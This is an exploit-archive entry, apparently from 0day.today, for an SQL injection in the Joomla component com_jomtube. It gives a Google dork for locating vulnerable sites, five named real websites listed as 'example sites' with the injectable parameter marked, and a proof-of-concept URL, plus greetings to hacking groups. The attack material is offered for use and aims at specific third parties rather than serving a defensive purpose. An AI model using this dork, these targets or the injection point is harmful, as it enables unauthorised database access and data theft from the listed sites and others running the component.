id: 18033
date: 04/10/2012
title: Joomla component (com_jomtube) SQL injection Vulnerability
author: xDarkSton3x
cves: 

##################################################
# Exploit Title: joomla component (com_jomtube) SQL injection Vulnerability
# Date: 10/04/2012
# Author: xDarkSton3x
# E-mail : xdarkston3x@msn.com
# Category:: webapps
# Google dork: inurl:"index.php?option=com_jomtube view=video id="
# Example Sites : 
http://www.reggaeton.com/index.php?option=com_jomtube&view=video&id='
http://www.acnethai.com/index.php?option=com_jomtube&view=video&id='
http://www.balonmanociudadencantada.com/index.php?option=com_jomtube&view=video&id=%27
http://www.bomberosguayaquil.gob.ec/index.php?option=com_jomtube&view=video&id=%27
http://urtoob.com/index.php?option=com_jomtube&view=video&id=%27
# Tested on: linux + windows
##################################################

[~]Exploit/p0c :
http://www.site.com/index.php?option=com_jomtube&view=video&id='[sql injection]

Greetz [ Rs4 - B4nz0k - FailRoot - FailSoft - W4rn1ng] - [ Malandrines Team  -  DiosdelaRed.Com - RemoteExecution ] [ Dedalo - Maztor ]



#  0day.today [2023-03-22]  #